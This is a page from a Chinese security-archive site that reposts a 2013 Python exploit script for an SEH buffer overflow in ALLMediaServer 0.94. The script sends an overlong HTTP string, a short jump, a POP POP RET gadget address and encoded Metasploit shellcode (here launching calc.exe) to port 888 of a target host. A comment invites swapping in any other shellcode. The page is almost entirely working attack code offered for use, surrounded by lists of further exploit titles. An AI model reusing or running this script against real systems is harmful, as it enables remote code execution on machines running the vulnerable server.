首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ALLMediaServer 0.94 SEH Overflow
来源:metacom27@gmail.com 作者:metacom 发布时间:2013-03-08  
#!/usr/bin/python
import socket, sys

##############################################################
# Exploit Title: ALLMediaServer 0.94 SEH Overflow Exploit
# Date: 07/03/2013
# Exploit Author: metacom
# E-mail:metacom27@gmail.com
# Software Link:http://allmediaserver.org/download
# Version: ALLMediaServer 0.94
# Tested On: Windows 7 German
#ALLMediaServer run online mod 
##############################################################
#"Usage: allmediaserver.py <ip>"
host = sys.argv[1]

buffer = "http://" + "\x41" * 1065

nseh = "\xEB\x06\x90\x90"    # Short Jump  

seh = "\xCA\x24\xEC\x65"       #POP POP RET 0x65EC24CA   avcodec-53.dll

nop = "\x90" * 50
#msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00' -e x86/shikata_ga_nai -t c
# you can replace the shellcode with any shellcode u want
shell = ("\xb8\x66\xa5\xa3\x41\xdb\xd5\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x33\x31\x43\x12\x83\xc3\x04\x03\x25\xab\x41\xb4\x55\x5b\x0c"
"\x37\xa5\x9c\x6f\xb1\x40\xad\xbd\xa5\x01\x9c\x71\xad\x47\x2d"
"\xf9\xe3\x73\xa6\x8f\x2b\x74\x0f\x25\x0a\xbb\x90\x8b\x92\x17"
"\x52\x8d\x6e\x65\x87\x6d\x4e\xa6\xda\x6c\x97\xda\x15\x3c\x40"
"\x91\x84\xd1\xe5\xe7\x14\xd3\x29\x6c\x24\xab\x4c\xb2\xd1\x01"
"\x4e\xe2\x4a\x1d\x18\x1a\xe0\x79\xb9\x1b\x25\x9a\x85\x52\x42"
"\x69\x7d\x65\x82\xa3\x7e\x54\xea\x68\x41\x59\xe7\x71\x85\x5d"
"\x18\x04\xfd\x9e\xa5\x1f\xc6\xdd\x71\x95\xdb\x45\xf1\x0d\x38"
"\x74\xd6\xc8\xcb\x7a\x93\x9f\x94\x9e\x22\x73\xaf\x9a\xaf\x72"
"\x60\x2b\xeb\x50\xa4\x70\xaf\xf9\xfd\xdc\x1e\x05\x1d\xb8\xff"
"\xa3\x55\x2a\xeb\xd2\x37\x20\xea\x57\x42\x0d\xec\x67\x4d\x3d"
"\x85\x56\xc6\xd2\xd2\x66\x0d\x97\x2d\x2d\x0c\xb1\xa5\xe8\xc4"
"\x80\xab\x0a\x33\xc6\xd5\x88\xb6\xb6\x21\x90\xb2\xb3\x6e\x16"
"\x2e\xc9\xff\xf3\x50\x7e\xff\xd1\x32\xe1\x93\xba\x9a\x84\x13"
"\x58\xe3")


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 888)) #default port
s.send(buffer+nseh+seh+nop+shell)
print "Exploit sent! Open Calc :)\n"
s.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Squid 3.x Denial Of Service
·Firebird Relational Database C
·Varnish 2.1.5 / 3.0.3 Denial O
·SCADA 3S CoDeSys Gateway Serve
·Samsung TV Denial Of Service
·VLC Player 2.0.x (.mp3) <= Mem
·SIP Witch 0.7.4 Denial Of Serv
·Windows Media Player 10.0.0.38
·Subversion 1.6.17 Denial Of Se
·Ubuntu 12.10 64bit Local Root
·Raspberry Pi rpi-update Local
·Fedora Ubuntu kernel 3.3-3.8 L
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved